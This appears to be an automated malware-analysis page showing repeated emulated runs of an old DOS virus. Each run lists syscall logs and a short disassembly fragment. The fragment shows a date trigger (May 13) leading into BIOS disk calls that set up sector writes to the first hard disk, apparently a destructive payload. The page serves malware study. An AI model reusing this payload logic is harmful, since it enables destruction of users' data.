Sample viewer

vx.netlux.org/Virus.DOS.PZ.955

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:31:08.501773435Z 98 PC: 16a09 | Get current PSP
2018-12-17T22:31:08.503742597Z 53 PC: 16a1c | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:31:08.505651548Z 37 PC: 16a58 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:31:08.508164287Z 42 PC: 16871 | Get date 0x16871: cmp al, 5
0x16873: jne 0x1687d
0x16875: cmp dl, 0xd
0x16878: jne 0x1687d
0x1687a: call 0x1687e
0x1687d: ret
0x1687e: mov ah, 8
0x16880: mov dl, 0x80
0x16882: int 0x13
0x16884: mov ax, cx
0x16886: mov cl, 0xa
0x16888: shr ax, cl
0x1688a: mov byte ptr cs:[bp + 0x235], al
0x1688f: xor ch, ch
0x16891: mov cl, dh
0x16893: inc cl
0x16895: push cx
0x16896: mov ah, 3
0x16898: mov dl, 0x80
0x1689a: mov dh, cl
2018-12-17T22:31:08.519672204Z 99 PC: 15209 | Get DBCS lead byte table pointer
2018-12-17T22:31:08.522352761Z 68 PC: 15223 | I/O control for devices (Set for = '')
2018-12-17T22:31:08.524294846Z 68 PC: 1522e | I/O control for devices (Set for = '')
2018-12-17T22:31:08.526498745Z 68 PC: 15239 | I/O control for devices (Set for = '')
2018-12-17T22:31:08.529427516Z 68 PC: 15241 | I/O control for devices (Set for = '��b���g�t�S3����[r�2��W�<t�<u�6�u����>��>W')
2018-12-17T22:31:08.531274497Z 48 PC: 15246 | Get DOS version
2018-12-17T22:31:08.533102308Z 64 PC: 1537b | Write file or device (Write 23 bytes on handle 2)
2018-12-17T22:31:08.539211551Z 76 PC: 12b6b | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5565,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:54:50.741969631Z 98 PC: 16a09 | Get current PSP
2018-12-25T11:54:50.743387944Z 53 PC: 16a1c | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:54:50.74484559Z 37 PC: 16a58 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:54:50.746159142Z 42 PC: 16871 | Get date 0x16871: cmp al, 5
0x16873: jne 0x1687d
0x16875: cmp dl, 0xd
0x16878: jne 0x1687d
0x1687a: call 0x1687e
0x1687d: ret
0x1687e: mov ah, 8
0x16880: mov dl, 0x80
0x16882: int 0x13
0x16884: mov ax, cx
0x16886: mov cl, 0xa
0x16888: shr ax, cl
0x1688a: mov byte ptr cs:[bp + 0x235], al
0x1688f: xor ch, ch
0x16891: mov cl, dh
0x16893: inc cl
0x16895: push cx
0x16896: mov ah, 3
0x16898: mov dl, 0x80
0x1689a: mov dh, cl
2018-12-25T11:54:50.758065969Z 99 PC: 15209 | Get DBCS lead byte table pointer
2018-12-25T11:54:50.760518887Z 68 PC: 15223 | I/O control for devices (Set for = '')
2018-12-25T11:54:50.762408966Z 68 PC: 1522e | I/O control for devices (Set for = '')
2018-12-25T11:54:50.764579852Z 68 PC: 15239 | I/O control for devices (Set for = '')
2018-12-25T11:54:50.767413503Z 68 PC: 15241 | I/O control for devices (Set for = '��b���g�t�S3����[r�2��W�<t�<u�6�u����>��>W')
2018-12-25T11:54:50.769319125Z 48 PC: 15246 | Get DOS version
2018-12-25T11:54:50.771191356Z 64 PC: 1537b | Write file or device (Write 23 bytes on handle 2)
2018-12-25T11:54:50.780336083Z 76 PC: 12b6b | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":4,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5565,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:54:51.145887361Z 98 PC: 16a09 | Get current PSP
2018-12-25T11:54:51.146943537Z 53 PC: 16a1c | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:54:51.148113864Z 37 PC: 16a58 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:54:51.149145177Z 42 PC: 16871 | Get date 0x16871: cmp al, 5
0x16873: jne 0x1687d
0x16875: cmp dl, 0xd
0x16878: jne 0x1687d
0x1687a: call 0x1687e
0x1687d: ret
0x1687e: mov ah, 8
0x16880: mov dl, 0x80
0x16882: int 0x13
0x16884: mov ax, cx
0x16886: mov cl, 0xa
0x16888: shr ax, cl
0x1688a: mov byte ptr cs:[bp + 0x235], al
0x1688f: xor ch, ch
0x16891: mov cl, dh
0x16893: inc cl
0x16895: push cx
0x16896: mov ah, 3
0x16898: mov dl, 0x80
0x1689a: mov dh, cl
2018-12-25T11:54:51.158985735Z 99 PC: 15209 | Get DBCS lead byte table pointer
2018-12-25T11:54:51.160441229Z 68 PC: 15223 | I/O control for devices (Set for = '')
2018-12-25T11:54:51.162051281Z 68 PC: 1522e | I/O control for devices (Set for = '')
2018-12-25T11:54:51.164684473Z 68 PC: 15239 | I/O control for devices (Set for = '')
2018-12-25T11:54:51.166156128Z 68 PC: 15241 | I/O control for devices (Set for = '��b���g�t�S3����[r�2��W�<t�<u�6�u����>��>W')
2018-12-25T11:54:51.167844418Z 48 PC: 15246 | Get DOS version
2018-12-25T11:54:51.16992179Z 64 PC: 1537b | Write file or device (Write 23 bytes on handle 2)
2018-12-25T11:54:51.174760302Z 76 PC: 12b6b | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":13,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5565,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:54:51.331717198Z 98 PC: 16a09 | Get current PSP
2018-12-25T11:54:51.332802356Z 53 PC: 16a1c | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:54:51.333899588Z 37 PC: 16a58 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:54:51.3349317Z 42 PC: 16871 | Get date 0x16871: cmp al, 5
0x16873: jne 0x1687d
0x16875: cmp dl, 0xd
0x16878: jne 0x1687d
0x1687a: call 0x1687e
0x1687d: ret
0x1687e: mov ah, 8
0x16880: mov dl, 0x80
0x16882: int 0x13
0x16884: mov ax, cx
0x16886: mov cl, 0xa
0x16888: shr ax, cl
0x1688a: mov byte ptr cs:[bp + 0x235], al
0x1688f: xor ch, ch
0x16891: mov cl, dh
0x16893: inc cl
0x16895: push cx
0x16896: mov ah, 3
0x16898: mov dl, 0x80
0x1689a: mov dh, cl

{"DateBased":true,"Day":4,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5565,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:54:51.605595212Z 98 PC: 16a09 | Get current PSP
2018-12-25T11:54:51.60704646Z 53 PC: 16a1c | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:54:51.608537752Z 37 PC: 16a58 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:54:51.609893706Z 42 PC: 16871 | Get date 0x16871: cmp al, 5
0x16873: jne 0x1687d
0x16875: cmp dl, 0xd
0x16878: jne 0x1687d
0x1687a: call 0x1687e
0x1687d: ret
0x1687e: mov ah, 8
0x16880: mov dl, 0x80
0x16882: int 0x13
0x16884: mov ax, cx
0x16886: mov cl, 0xa
0x16888: shr ax, cl
0x1688a: mov byte ptr cs:[bp + 0x235], al
0x1688f: xor ch, ch
0x16891: mov cl, dh
0x16893: inc cl
0x16895: push cx
0x16896: mov ah, 3
0x16898: mov dl, 0x80
0x1689a: mov dh, cl
2018-12-25T11:54:51.619409598Z 99 PC: 15209 | Get DBCS lead byte table pointer
2018-12-25T11:54:51.621012326Z 68 PC: 15223 | I/O control for devices (Set for = '')
2018-12-25T11:54:51.622318731Z 68 PC: 1522e | I/O control for devices (Set for = '')
2018-12-25T11:54:51.623721828Z 68 PC: 15239 | I/O control for devices (Set for = '')
2018-12-25T11:54:51.625353254Z 68 PC: 15241 | I/O control for devices (Set for = '��b���g�t�S3����[r�2��W�<t�<u�6�u����>��>W')
2018-12-25T11:54:51.626874372Z 48 PC: 15246 | Get DOS version
2018-12-25T11:54:51.628222594Z 64 PC: 1537b | Write file or device (Write 23 bytes on handle 2)
2018-12-25T11:54:51.632949865Z 76 PC: 12b6b | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":13,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5565,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:54:51.902234122Z 98 PC: 16a09 | Get current PSP
2018-12-25T11:54:51.904354638Z 53 PC: 16a1c | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:54:51.906076815Z 37 PC: 16a58 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:54:51.907493462Z 42 PC: 16871 | Get date 0x16871: cmp al, 5
0x16873: jne 0x1687d
0x16875: cmp dl, 0xd
0x16878: jne 0x1687d
0x1687a: call 0x1687e
0x1687d: ret
0x1687e: mov ah, 8
0x16880: mov dl, 0x80
0x16882: int 0x13
0x16884: mov ax, cx
0x16886: mov cl, 0xa
0x16888: shr ax, cl
0x1688a: mov byte ptr cs:[bp + 0x235], al
0x1688f: xor ch, ch
0x16891: mov cl, dh
0x16893: inc cl
0x16895: push cx
0x16896: mov ah, 3
0x16898: mov dl, 0x80
0x1689a: mov dh, cl

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5565,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:54:51.96185364Z 98 PC: 16a09 | Get current PSP
2018-12-25T11:54:51.963145295Z 53 PC: 16a1c | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:54:51.964443481Z 37 PC: 16a58 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:54:51.965588654Z 42 PC: 16871 | Get date 0x16871: cmp al, 5
0x16873: jne 0x1687d
0x16875: cmp dl, 0xd
0x16878: jne 0x1687d
0x1687a: call 0x1687e
0x1687d: ret
0x1687e: mov ah, 8
0x16880: mov dl, 0x80
0x16882: int 0x13
0x16884: mov ax, cx
0x16886: mov cl, 0xa
0x16888: shr ax, cl
0x1688a: mov byte ptr cs:[bp + 0x235], al
0x1688f: xor ch, ch
0x16891: mov cl, dh
0x16893: inc cl
0x16895: push cx
0x16896: mov ah, 3
0x16898: mov dl, 0x80
0x1689a: mov dh, cl
2018-12-25T11:54:51.975297899Z 99 PC: 15209 | Get DBCS lead byte table pointer
2018-12-25T11:54:51.976418496Z 68 PC: 15223 | I/O control for devices (Set for = '')
2018-12-25T11:54:51.97765918Z 68 PC: 1522e | I/O control for devices (Set for = '')
2018-12-25T11:54:51.979708333Z 68 PC: 15239 | I/O control for devices (Set for = '')
2018-12-25T11:54:51.980974343Z 68 PC: 15241 | I/O control for devices (Set for = '��b���g�t�S3����[r�2��W�<t�<u�6�u����>��>W')
2018-12-25T11:54:51.982509197Z 48 PC: 15246 | Get DOS version
2018-12-25T11:54:51.984848798Z 64 PC: 1537b | Write file or device (Write 23 bytes on handle 2)
2018-12-25T11:54:51.990111092Z 76 PC: 12b6b | Terminate with return code (Return code = '0')